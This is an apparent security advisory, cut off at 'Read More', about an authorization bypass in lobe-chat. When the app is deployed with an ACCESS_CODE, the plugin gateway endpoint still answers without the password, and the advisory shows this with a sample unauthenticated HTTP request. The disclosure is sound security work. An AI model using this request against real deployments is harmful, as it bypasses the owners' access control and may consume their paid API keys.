Description: When the application is password-protected (deployed with the ACCESS_CODE option), it is possible to access plugins without proper authorization (without password). Proof-of-Concept: Let’s suppose that application has been deployed with following command: sudo docker run -d -p 3210:3210 -e OPENAI_API_KEY=sk-[REDACTED] -e ACCESS_CODE=TEST123 –name lobe-chat lobehub/lobe-chat Due to the utilization of the ACCESS_CODE, access to the chat is possible only after entering the password: However, it is possible to interact with chat plugins without entering the ACCESS_CODE. Example HTTP request: “` POST /api/plugin/gateway HTTP/1.1 Host: localhost:3210 Content-Length: 1276 {"apiName":"checkWeatherUsingGET","arguments":"{n "location": "London"n}","identifier":"WeatherGPT","type":"default","manifest":{"api":[{"description":"Get current weather information","name":"checkWeatherUsingGET","parameters":{"properties":{"location":{"type":"string"}},"required":["location"],"type":"object"}}],"homepage":"https://weathergpt.vercel.app/legal","identifier":"WeatherGPT","meta":{"avatar":"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/logo.webp","description":"Get current weather information for a specific location.","title":"WeatherGPT"},"openapi":"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/openapi.json","systemRole":"Use the WeatherGPT plugin to automatically fetch current weather information for a specific location when it's…Read More